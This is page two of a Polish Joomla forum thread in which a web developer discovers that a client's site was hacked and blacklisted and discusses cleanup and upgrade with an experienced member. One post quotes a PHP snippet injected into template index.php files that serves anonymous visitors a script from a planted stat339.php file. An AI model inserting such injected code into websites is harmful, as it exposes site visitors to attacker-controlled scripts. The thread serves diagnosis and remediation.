Nie działa środkowanie obrazków. - Strona 2
Strona 2 z 2 PierwszyPierwszy 12
Wyniki 11 do 17 z 17

Temat: Nie działa środkowanie obrazków.

  1. #11
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    26 831
    Punkty
    1096

    Domyślny

    Bez obrazy, ale
    a) po pierwsze szanuj to, co piszą Ci specjaliści (a jestem nim na pewno)
    b) nie stawiaj na dodatek publicznie, w wątpliwość swoich kompetencji, bo ujawniając swoje błędne przekonanie, po prostu się kompromitujesz. Ja osobiście, gdybym przeczytał zamieszczony powyżej post jako właściciel witryny, po takim dictum zrezygnowałbym natychmiast z Twoich usług. Po prostu nie masz pojęcia o materii rzeczy, o której się wypowiadasz i na którą masz odpowiednio zareagować. Oczywiście, że nie musisz się na tym znać, bo to wiedza wysoce specjalistyczna, więc nie w tym problem, że czegoś nie wiesz lub nie umiesz, ale że publicznie wypisujesz, co wypisujesz.

    Jeśli podjąłeś się odnowienia tej witryny, a nie zbadałeś wcześniej, czy nie jest uszkodzona, to - niestety - głównie Twój problem. Jeśli nic nie zmieniałeś w oryginalnej witrynie, możesz powiedzieć klientowi, że przykro Ci bardzo, ale witryna jest uszkodzona, po ataku cyberprzestępcy i wymaga "wyleczenia", czego wcześniej nie wiedziałeś (a teraz wiesz). Co najwyżej stracisz trochę swojej pracy, ale to i tak niewielki koszt zważywszy, że klient może stanąć na stanowisku, że oddał Ci do dyspozycji nieuszkodzoną witrynę, a w wyniku Twoich działa lub w czasie, gdy Ty sprawowałeś nad nią pieczę, doszło do uszkodzenia.
    Oczywiście, można się przed takimi zarzutami obronić, ale to potrwa i być może pokosztuje.

    Nie ma żadnej drogi na skróty. Metodyczne postępowanie (w dużym skrócie) przedstawiłem a artykule, do którego masz link w pierwszej mojej odpowiedzi. Bogatsze informacje masz w książce Pawła Frankowskiego.
    Po naprawieniu witryny i upewnieniu się, że wszystko jest OK, zgłaszasz witrynę do ponownej weryfikacji w Google i Yahoo .

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #12
    Nowicjusz
    Dołączył
    16-10-2009
    Wpisy
    11
    Punkty
    10

    Domyślny

    Nikogo nie obraziłem, a zdanie każdego szanuję niekoniecznie specjalisty.
    Jak już wspominałem, informowałem klienta że witryna jest przestarzała może mieć luki i należy ją zmienić. Niestety to inne pieniądze na co klient się nie zgodził, ma być tylko grafika. To tyle na temat klienta.
    Strony oryginalnej nie dotykałem, backup oraz bazę dostałem od właściciela serwera (twórcy tej witryny) wszystko robiłem lokalnie.
    Przeanalizowałem za pomocą Winmerge pliki i znalazłem taki dodatek w plikach indeks.php templatek.

    Kod:
    <?php $_3391b0d8=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "
    <script language=JavaScript id=onDate ></script>
    <script language=JavaScript src=/media/system/js/stat339.php ></script>
    ";};$_3391b0d8=1; ?>
    Być może to jest przyczyna blokady i skutek nie zabezpieczonej witryny.
    Artykuł przeczytałem,
    Co do moich kompetencji, siedzę w informatyce całe życie, ale nie prowadzę firmy zajmującej profesjonalnym tworzeniem witryn. Z racji zawodu staram się być na bieżąco, jednak nie jestem w stanie wszystkiego ogarnąć, nikt nie jest.
    Dzięki za informację i pomoc.

  4. #13
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    26 831
    Punkty
    1096

    Domyślny

    Mam nadzieję, że nie odczytałeś mojej pisaniny jako ataku. Oczywiście, że nikogo nie obraziłeś Pisząc o szanowaniu tego co piszą inni, miałem na myśli tylko pogląd, że witryna została zhakowana/trafiła na indeksy po umieszczeniu linku na forum. Po prostu nie ma takiej opcji (jest odwrotna - trafiliśmy swego czasu na chwilę na indeksy z powodu linków do zawirusowanych stron).
    To oczywiste, że nie ma szans, by wszystko samemu ogarniać, najtęższe umysły "ogarniają" zaledwie ułamki wiedzy w swoich dziedzinach.

    PS Ten fragment to zapewne tylko jeden z wielu wstrzykniętych... W joomla nie ma takiego pliku stat339.php - to zapewne plik dorzucony z zewnątrz i na pewno nie jedyny.

  5. #14
    Nowicjusz
    Dołączył
    16-10-2009
    Wpisy
    11
    Punkty
    10

    Domyślny

    Strona musi ruszyć jak najszybciej, właściciel już nawet zdecydował się na nową może być jednak problem z migracją bazy, poza tym nie mam żadnej gotowej templatki a stara nie zadziała na nowej Joomli. Wezmę paczkę z połataną 1.5 do której link dostałem, poskładam to wszystko do kupy z backupu i spróbuję przenieść na serwer. Sprawdzę pod kątem dziur i jak będzie czysto wyślę prośbę do google. Tak to widzę, na krótko, a w międzyczasie zrobi się coś nowego uwzględniając urządzenia mobilne.

    stat339.php trafił w lokalizację /media/system/js oraz /modules/mod_stats
    pojawił się także w cache jakiś mod_arttextrotator

    ech dobra trzeba brać się do roboty... życie.

  6. #15
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    26 831
    Punkty
    1096

    Domyślny

    Jeśli strona nie ma zbyt wielu rozszerzeń, to aktualizacja do najnowszej joomla nie jest bardzo skomplikowana. A szablon? Korzystając z frameworka mozna dość szybko dostosować jakiś standardowy. Powodzenia.

  7. #16
    Debiutant
    Dołączył
    08-04-2017
    Skąd
    Elbląg
    Wpisy
    1
    Punkty
    2

    Domyślny

    sam kod nic nie da, też tak kiedyś miałem i dopiero grzebiąc w necie odkryłem co robię źle.

  8. #17
    Przeglądacz
    Dołączył
    19-12-2014
    Wpisy
    41
    Punkty
    7

    Domyślny

    Postaw J w tej samej wersji i przed importem bazy utwórz menu i kategorię pilnując kolejności - ID muszą się zgadzać. Wtedy baza się poprawnie zaimportuje.
    niezwłocznie po tym zrób kilka upgradów do powiedzmy 2.6, sprawdź czy nie ma błędów w bazie i upgraduj do najwyższej.

Strona 2 z 2 PierwszyPierwszy 12

Podobne tematy

  1. Wyśrodkowanie linii w artykule kodem align="center" nie działa
    przez ted na forum Szablony, formatowanie wyglądu
    Odpowiedzi: 9
    Ostatni post/autor: 27-10-2012, 11:48
  2. Tabela - wyśrodkowanie pod Firefox nie działa
    przez rafalekb19 na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 1
    Ostatni post/autor: 15-10-2010, 14:38
  3. Wyśrodkowanie - nie działa?
    przez bo0L na forum Szablony graficzne
    Odpowiedzi: 19
    Ostatni post/autor: 11-03-2009, 17:45
  4. Wyśrodkowanie tekstu działa tylko w niektórych szablonach
    przez piasio na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 3
    Ostatni post/autor: 24-12-2008, 12:06
  5. Nie działa edycja HTML oraz wstawianie obrazków
    przez kwidzi na forum Administracja Joomla!
    Odpowiedzi: 9
    Ostatni post/autor: 24-09-2007, 09:28

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •